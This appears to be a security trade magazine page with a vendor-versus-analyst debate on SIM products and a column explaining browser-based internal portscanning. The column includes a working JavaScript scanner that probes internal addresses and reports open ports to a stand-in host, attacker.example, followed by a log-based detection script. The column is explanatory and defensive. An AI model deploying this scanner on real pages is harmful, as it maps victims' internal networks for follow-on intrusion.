FOR
by Tracy Hulver, vice president of product management and marketing, netForensics

Security information management (SIM) technology provides enterprises with a powerful solution to address today's complex risk management and compliance challenges. SIM has become a proven security strategy for securing corporate resources, protecting valuable information and meeting regulatory requirements. SIM is strategically positioned in the heart of the security infrastructure to incorporate information from strategic applications and critical compliance-related assets, as well as the perimeter devices that protect them. With an effective SIM solution, companies can gauge whether they are improving their overall risk posture and effectively addressing organizational security policies.

 SIM offers a flexible solution for tying together the array of disparate security technologies. SIM solutions rationalize volumes of raw security data from all types of sources in a concise process. This security-related data is transformed into security intelligence that can be used to drive decisions regarding appropriate mitigation and remediation.


AGAINST
by Mike Rothman, president and principal analyst, Security Incite

Enterprise customers are definitely looking for solutions to help them manage their security environment more effectively. They need to understand what is happening and, more importantly, what they should be doing to fix any potential issues. But they need this to happen in near real-time because in an attack situation, the clock is ticking. They also need to store that log data in a way that ensures forensic integrity.

Lots of folks want to talk about compliance also, but the reality is that documentation about process and programs, with a demonstration of the controls in place, suffices. Anything more than that is overkill.

The problem is that today's current generation of security information management (SIM) products don't meet those needs. They are big, expensive and require a tremendous amount of integration.

Customers are better off devoting some resources to a log management platform to give them 80 percent of what they need at 20 percent of the cost.


THREAT OF THE MONTH
Portscanning

What is it?
Techniques have recently been developed for turning a user's web browser into a portscanning engine. An attacker can use it to remotely enumerate servers and services running on the internal network; because the probes originate from the user's own machine, they bypass the perimeter firewall.

How does it work?
An attacker sets up a website and entices corporate users to visit it. Content served by that site then causes the browser to send probes to common internal IP address ranges (the private address ranges most corporate networks use) and to report the outcome of each probe back to the attacker's web server. In this way the browser becomes a proxy into the network: the attacker never connects to the internal hosts directly.
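The mechanism above, as an added example that is not code from the column. A script on the attacker's page cannot open raw sockets, but it can ask the browser to fetch `http://<internal-ip>:<port>/` as an image and watch whether the request fails and how quickly it fails. The 10.0.0.0/24 range, the port list, the timing thresholds and the collector URL `attacker.example` are assumptions made for illustration:

```javascript
// Added example, not code from the column: how a web page turns the visiting
// browser into a portscanner. Scripts cannot open raw sockets, but they can
// ask the browser to fetch http://<internal-ip>:<port>/ as an image and watch
// whether the request fails, and how quickly. The address range, ports,
// timing thresholds and collector URL are assumptions made for illustration.

const FAST_ERROR_MS = 100;   // assumed: a TCP reset (connection refused) arrives well under this
const TIMEOUT_MS = 3000;     // assumed: anything slower than this is treated as no answer
const COLLECTOR = 'http://attacker.example/collect'; // assumed reporting endpoint

// Infer the port state from the only two things the page can observe about an
// <img> load: which event fired, and how long it took.
//   load           -> a real image came back: open
//   error, fast    -> connection refused: host up, port closed
//   error, slow    -> TCP connected, server sent non-image bytes (HTML, a banner): open
//   timeout        -> nothing answered: filtered by a firewall, or no host there
function classifyProbe(event, elapsedMs) {
  if (event === 'load') return 'open';
  if (event === 'error') return elapsedMs < FAST_ERROR_MS ? 'closed' : 'open';
  return 'filtered';
}

// Expand a /24 prefix ("10.0.0") into its 254 host addresses.
function hostsInSlash24(prefix) {
  const hosts = [];
  for (let i = 1; i <= 254; i++) hosts.push(`${prefix}.${i}`);
  return hosts;
}

// Build the report URL: only the open ports, packed into a query string on a
// GET that the attacker's web server simply logs.
function encodeReport(results) {
  const open = results.filter(r => r.state === 'open').map(r => `${r.ip}:${r.port}`);
  return `${COLLECTOR}?open=${encodeURIComponent(open.join(','))}`;
}

// Browser only: probe one ip:port with an <img> and resolve with its state.
// Browsers refuse outright to connect to a list of well-known ports
// (22, 25, 139 and others), so those always look 'closed' from here.
function probe(ip, port) {
  return new Promise(resolve => {
    const started = Date.now();
    let settled = false;
    const finish = event => {
      if (settled) return;
      settled = true;
      resolve({ ip, port, state: classifyProbe(event, Date.now() - started) });
    };
    const img = new Image();
    img.onload = () => finish('load');
    img.onerror = () => finish('error');
    setTimeout(() => finish('timeout'), TIMEOUT_MS);
    img.src = `http://${ip}:${port}/?${Math.random()}`; // query string defeats the cache
  });
}

// Browser only: scan the range (sequentially here; real pages fire probes in
// parallel) and hand the results back with one ordinary-looking outbound GET.
async function scanAndReport(prefix, ports) {
  const results = [];
  for (const ip of hostsInSlash24(prefix)) {
    for (const port of ports) results.push(await probe(ip, port));
  }
  new Image().src = encodeReport(results);
}

// Only the inference and encoding logic runs outside a browser.
if (typeof Image !== 'undefined') scanAndReport('10.0.0', [80, 443, 8080]);
```

The timing heuristic is noisy (a slow network can turn a refused connection into an "open" verdict, and ports the browser refuses to contact always read as closed), but an attacker only needs a rough map. Note what the perimeter sees: one normal-looking HTTP GET to the attacker's site carrying the results, and none of the probes.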

Should I be worried?
Enumerating services is not in itself an attack, but it can be the precursor to one. A follow-on attack through the browser proxy is more likely to succeed if internal servers have not been given the same patching priority as internet-facing ones, which is common when they are assumed to be unreachable from the internet.

How can I prevent it?
When patching software vulnerabilities on internal servers, consider how those services can be reached from workstations that also have internet access, not only from the internet itself. Firewall user workstations off from internal server networks and permit only the services specifically required. Deploy portscan detection and intrusion prevention on all network segments, whether they are internet-connected or not; a scan launched through a browser never crosses the perimeter, so perimeter-only sensors will not see it.
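What the last control has to look for, as an added example that is not code from the column: because the browser does the probing, the source address in internal logs is the user's workstation, and the signature is one workstation touching many distinct internal ip:port targets within a short window, most of them refused or unanswered. The log format, the addresses, the ten-second window and the threshold of eight targets are all assumptions made for illustration:

```javascript
// Added example, not code from the column: a minimal scan detector of the kind
// an internal segment sensor would run. Because the browser does the probing,
// the source address is the user's workstation, and the signature is one
// workstation touching many distinct internal ip:port targets within a short
// window, most of them refused or unanswered. The log format, addresses,
// window and threshold are assumptions for illustration.

const WINDOW_MS = 10000;  // assumed sliding window
const THRESHOLD = 8;      // assumed: distinct ip:port targets per window before alerting

// Constructed sample, one line per connection attempt as a stateful firewall
// between the user and server segments might log it:
//   <epoch-ms> <src> <dst> <dport> <outcome>    outcome: established|refused|timeout
// 10.0.1.23 is a workstation whose browser is sweeping 10.0.0.x:80;
// 10.0.1.50 is a workstation doing ordinary file-share and web traffic.
const SAMPLE_LOG = `
1700000000000 10.0.1.23 10.0.0.1 80 refused
1700000000100 10.0.1.23 10.0.0.2 80 refused
1700000000200 10.0.1.23 10.0.0.3 80 timeout
1700000000300 10.0.1.23 10.0.0.4 80 refused
1700000000400 10.0.1.23 10.0.0.5 80 established
1700000000500 10.0.1.50 10.0.0.20 443 established
1700000000500 10.0.1.23 10.0.0.6 80 refused
1700000000600 10.0.1.23 10.0.0.7 80 refused
1700000000700 10.0.1.23 10.0.0.8 80 refused
1700000000800 10.0.1.23 10.0.0.9 80 refused
1700000002000 10.0.1.50 10.0.0.21 445 established
1700000004000 10.0.1.50 10.0.0.20 443 established
`;

function parseLog(text) {
  return text.trim().split('\n').map(line => {
    const [ts, src, dst, dport, outcome] = line.trim().split(/\s+/);
    return { ts: Number(ts), src, dst, dport: Number(dport), outcome };
  });
}

// Sliding window per source: alert the first time a source has reached
// `threshold` distinct targets within `windowMs`.
function detectScans(events, windowMs = WINDOW_MS, threshold = THRESHOLD) {
  const bySrc = new Map();
  for (const e of events) {
    if (!bySrc.has(e.src)) bySrc.set(e.src, []);
    bySrc.get(e.src).push(e);
  }
  const alerts = [];
  for (const [src, evs] of bySrc) {
    evs.sort((a, b) => a.ts - b.ts);
    let start = 0;
    for (let end = 0; end < evs.length; end++) {
      while (evs[end].ts - evs[start].ts > windowMs) start++;
      const window = evs.slice(start, end + 1);
      const targets = new Set(window.map(e => `${e.dst}:${e.dport}`));
      if (targets.size >= threshold) {
        const unanswered = window.filter(e => e.outcome !== 'established').length;
        alerts.push({
          src,
          firstSeen: evs[start].ts,
          lastSeen: evs[end].ts,
          distinctTargets: targets.size,
          unansweredRatio: unanswered / window.length,
        });
        break; // one alert per source is enough here
      }
    }
  }
  return alerts;
}

const ALERTS = detectScans(parseLog(SAMPLE_LOG));
for (const a of ALERTS) {
  console.log(`scan from ${a.src}: ${a.distinctTargets} targets in ${a.lastSeen - a.firstSeen} ms, `
            + `${Math.round(a.unansweredRatio * 100)}% refused/unanswered`);
}
```

The sample flags 10.0.1.23 and leaves the ordinary workstation alone. The high refused/unanswered ratio is what separates a sweep from a busy but legitimate host, and it is only visible to a sensor sitting between the workstation and server segments; the perimeter records nothing but the user's visit to the attacker's site.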

— Joe Stewart, senior researcher, SecureWorks (formerly LURHQ)